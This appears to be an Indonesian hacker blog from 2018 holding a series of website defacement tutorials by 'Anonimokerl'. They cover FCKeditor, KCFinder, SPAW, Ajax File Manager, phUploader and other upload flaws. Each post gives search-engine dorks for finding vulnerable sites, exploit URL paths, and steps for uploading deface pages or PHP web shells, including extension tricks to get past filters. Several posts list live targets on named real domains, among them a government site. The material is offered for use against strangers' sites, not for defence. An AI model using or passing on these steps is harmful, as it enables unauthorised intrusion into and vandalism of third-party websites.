Wednesday, 11 April 2018

Deface FcKeditor

Author : Anonimokerl

Hae kimak!1!1 Balik lagi dengan mimin yang tamvan!1!1!1 Kali ini mimin akan share tutor deface poc Fckeditor. Langsung saja mak!1!1!1

1. Bahan-bahan :

  1. Internet
  2. Hp/PC
  3. Script deface

2. Dork :

  • inurl:advert_detail.php?id=

3. Exploit :

  • /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
4. Langkah-langkah :
  • Pertama, kyta dorking dulu mak!1!1!1!1
  • Kedua, pilih salah satu web.
  • Ketiga, masukan exploitya dibelakang site.
Contoh :
  • Https://nimogans.tq/ 
Lalu kyta masukan exploitnya, menjadi :
  • Https://nimogans.tq/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Kalo vuln maka akan seperti ini (cek gambar dibawah).


  • Keempat, upload sadja scriptnya :V 
Letak filemu? filenya berada di web/files/namasc.html
contoh:
Https://nimogas.tq/files/nimo.html
  • Dan taraaaaa!1!1!1 Kalian dah bisa :* unchhh
5. Live target :

Note : Untuk live target masukan dulu exploitya!1!1

Sekian dulu mak!1!1 Kalo ada yang mau ditanyakan comment sadja :* 
mmmppppssshhhhhh

Cara Deface Kcfinder Upload Shell

Hello guys, gimana kabarnya? Sehat Kan? Kapan Mati Goblok >:(
Kali ini w Admin Paduka Tamvan mau post Tutorial Deface Kcfinder Upload Shell ok


POC ini Poc Up Shell pertama yang gw bisa dan di ajarin oleh tmen saya Z-I SLOW :v

BAHAN =
- Dork : inurl:/modules/kcfinder/
- Exploit : www.target.com/[path]/modules/kcfinder/upload.php
- CSRF : Don't Kill Me,I Have A Cat :(
- Kopi
- Nekopoi.band

STEP BY STEP :

  1. Dorking di google
  2. Masukin exploit www.target.com/modules/kcfinder/upload.php
  3. Kalau blank dan muncul alert "unknow error" berartu vuln y, lanjut pergi ke CSRF. Masukin link target kamu di bagian URL, dibagian Post File isi " Filedata "
  4. Klik kunci target, setelah itu upload shell kalian dengan extensi .php.acc.db atau .php5
  5. Akses shell kalian 
  6. www.target.com/modules/kcfiner/upload/file/shell.php5

Sekian terimakasih :) SEMOGA KECYDUK LU KIMAK >:(

Tuesday, 10 April 2018

Deface Pro Taxi

Author : Anonimokerl

Hae beb :* Kali ini mimin yang super tamvan akan share cara deface poc pro taxi. Langsung sadja gan

1. Bahan :

  1. Shell ext .php5, kagak punya? klik disini!!
  2. Script deface ext .html
  3. Internet
  4. HP/PC
  5. Wajah tamvan :V
2. Dork :
  • inurl:/user/signin intext:SIGN IN NOW
  • inurl:public/user/signup
3. langkah-langkah :
  • Pertama kita dorking dulu gan.
  • Kedua, pilih salah satu web. Kalo vuln maka akan muncul seperti ini kalo pake dork pertama (kalo dork kedua akan langsung ke register).
  • Ketiga, kalian register dulu, isi bebas sadja :V
  • Keempat, Kalian login pake email dan password yang tadi register.
  • Kelima, kalian klik profile dan upload script deface atau shell ext .php5. Cek gambar dibawah
  • keennam, setelah kalian upload maka, gambar profilenya akan rusak, nah sekarang kalian klik kanan dan pilih buka gambar di tab baru (kalo di pc) kalo di hp cuman tekan dan plih show url lalu copas di bar link. Cek gambar dibawah.

Dan tarraaa selesai :V Kalo kalian tadi upload shell maka kalian tinggal  tebas sadja ato nitip file :V Kalo mau nebas usahakan backup dulu. Kagak bisa tebas index? tenang klik disini!!

Ko saya gagal upload shell ea? kagak semua web vuln upload shell gan :V

4. Live target :
Note : Live targetnya kagak bisaa upload shell, cuman vuln upload script deface doang

Sekian dulu gan :V Kalo ada yang mau nanya comment sadja :*

Deface Ajax File Manager

Author : Anonimokerl


Hae para jomblo dan jones!1!1!1 Kali ini mimin yang tamvan akan share  deface poc ajax file manager!1!1 Langsung sadja gan.

1. Bahan :

  1. Script deface ext .html dan .txt
  2. Internet
  3. Hp/PC
2. Dork


  • intitle:"Ajax File Manager" site:au
  • inurl:/ajaxfilemanager.php intext:"/Root Folder"
  • inurl:/ajaxfilemanager.php intext:"upload"
  • inurl:/ajaxfilemanager.php site:au
  • intitle:"index of" intext:"ajaxfilemanager.php"

Note : site: boleh di ganti dengan domain yang lain atau di hapus.

3. Langkah-langkah :
  • Pertama, kyta dorking dulu gan.
  • Kedua, piih salah satu web.
  • Ketiga, kyta klik tombol upload yang dipojok, cek gambar dibawah.

  • Keempat, kalo udah di upload, sekarang kalian cari file yang tadi diupload.
  • Kelima, setelah ketemu kalian tekan icon yang disamping filenya (cek gambar dibawah), terus klik show url dan copy paste di bar url.


Selesai gan :V

4. Live target :

Sekian dulu gan!1!1
Kalo ada yang kurang ngerti comment sadja :*

Saturday, 7 April 2018

Deface phUploader

Author : Anonimokerl

Hae gan!1!! Malam minggu dikota mimin  hujan gan :( jadi kagak bisa kencan asw_- jadi mimin yang tamvan ini akan memberikan cara deface poc phUploader. Langsung sadja gan :V

1. Bahan :

  • Internet
  • Hp/PC
  • Script .txt
2. Dork :

intitle:"Powered by phUploader" intext:"txt"

3. Langkah-langkah :

  • Pertama, kita dorking dulu menggunakan dork diatas.
  • Kedua, kita pilih salah satu web.
Kalo vuln maka akan muncul seperti ini


  • Ketiga, kalian upload saja script nya dan klik enter (yang dibuletin)
  • Keempat, Nanti akan muncul link script kita berada. Cek gambar dibawah.

  • Kelima, kalian copy aja linknya.
  • Dan taraaaa kalian telah sukses :V
4. Live Target :

Sekian dulu gan.
Kalo ada yang kurang jelas comment sadja :*

Deface File Upload Manager v1.3 Rename To

Author : Anonimokerl

Yo balik lagi dengan mimin yang tamvan :V Kali ini mimin akan post cara deface poc File Upload Manager v1.3 Rename To. Langsung sadja :*

1. Bahan :

  • Internet
  • Hp/PC
  • Script ext .htm

2. Dork :

  • intitle:File Upload Manager v1.3
  • "File Upload Manager v1.3" "rename to" "file types allowed"
  • Inurl:/fileupload/ intitle:"File Upload Manager v1.3"
  • inurl:/web/fileupload/ intitle:"File Upload Manager v1.3"
3. Langkah-langkah :


  • Pertama, kita dorking dengan menggunakan salah satu dork diatas.
  • Kedua, kita pilih salah satu web.
Kalo vuln maka akan seperti ini :

  • Ketiga, kita isi semua kolomnya dan upload script defacenya.
  • Keempat, kita tambahkan exploit [path]/store/namascript.htm
  • Dan taraaa, sukses gan :V
4. Live Target :

Sekian dulu gan, Mohon maaf bila ada yang kurang jelas :V
Kalo ada yang tidak mengerti comment aja :*

Daface Messange Board Forum

Author : Anonimokerl

Daface Messange Board Forum
Hae gan, Kali ini mimin tamvan akan share cara deface poc Messange Board Forum. Walaupun hanya bisa upload txt tapi bisa mirror ko :* Langsung sadja gan.

1. Bahan :

  • Internet
  • Hp/Pc
  • Script ext .txt

2. Dork :

  • inurl:"/forum.php?forumid=
  • Inurl:"/forum_topic_create.php?"
3. Langkah-langkah :
  • Pertama, dorking dulu gan.
  • Kedua, pilih salah satu web.
  • Ketiga, Klik New topic. Lihat gambar dibawah.

  •  Keempat, kalian isi kolom yang ada tanda (*) sadja. Cek gambar dibawah.
  • Kelima, kalo udah diisi kolomnya, kalian klik post topic.
  • Keenam, klik nama script kalian, cek gambar dibawah.
  • Dan taraaaaa, Kalian telah berhasil :*
Live target :


Sekian dulu gan.
Kalo ada yang kurang jelas comment aja.

Friday, 6 April 2018

Deface SPAW File Manager

Author : Anonimokerl

Hae kamvank!1!1 Bertemu lagi dengan mimin yang tamvan :V Kali ini mimin akan share cara deface Poc SPAW File Manager. Langsung aja gan!1!1!1

1. Bahan-bahan :

  • Script Deface ext .html dan .txt
  • Internet
  • Hp/PC
2. Dork
  •  inurl:Spaw2/dialogs/
  •  Inurl:spaw2/uploads/files \
  •  Index of:/Spaw2/uploads/files

3. Exploit :
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=

4. Langkah-langkah
  • Pertama, kita dorking dulu gan.
  • Kedua, kita pilih salah satu web dan tambahkan exploit dibelakang site/ 
Contoh :
Https://nimogans.tq/spaw2/upload/files
Lalu kita tambahkan exploitnya, menjadi
Https://nimogans.tq/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=


Kalo vuln muncul kek gambar diatas
  • Ketiga, kita setting dulu. Samakan kek yg diatas (yang ditandai)
  • Keempat kita upload scriptnya (kagak semua vuln upload html)
  • Kelima, Kita tambahkan exploit
/spaw2/upload/files/namascript
Contoh :
  • Selesai gan.
Live target
http://www.wholehealthamerica.com/spaw2/
tambahkan dulu exploitnya

Sekian dulu gan, kalo ada yang kurang ngerti comment aja :*

Wednesday, 4 April 2018

Deface Priv8 SCR

Author : Anonimokerl

Deface Priv8 SCR
Hae mblo, Kali ini mimin akan share cara deface poc Priv8 SCR. Deface ini kagak perlu upload :V
Langsung aja gan.

1. Bahan-bahan

  • Internet
  • Hp/Pc

2. Dork :
inurl:config/config.izo

3. Langkah-langkah :

  • Dorking dulu gan.
  • Pilih salah satu web
Kalo vuln akan muncul seperti ini :




  • Lalu kalian isi kolomnya
Kolom besar isi nama team kamu
Kolom kecil isi "Hacked By Nick kamu"
Contoh :

  • Kalo dah diisi kolomnya, kalian klik Hajar!
  • Lalu tambahkan exploit /config/tar.tmp di belakang web
contoh : http://coloredlion.com/config/tar.tmp
dan tara sekarang muncul nick kamu :V


Live target?
http://coloredlion.com/

http://www.arthub.com.au/
http://www.pa-cirebon.go.id/
http://www.kirtasiyeofisi.com.tr/
http://www.ortakoytarim.com.tr/
Tambahkan dulu exploit /config/config.izo buat live target.
Contoh :
http://coloredlion.com/config/config.izo

Sekian dulu gan :V
Kalo ada yang kurang ngerti bisa comment :V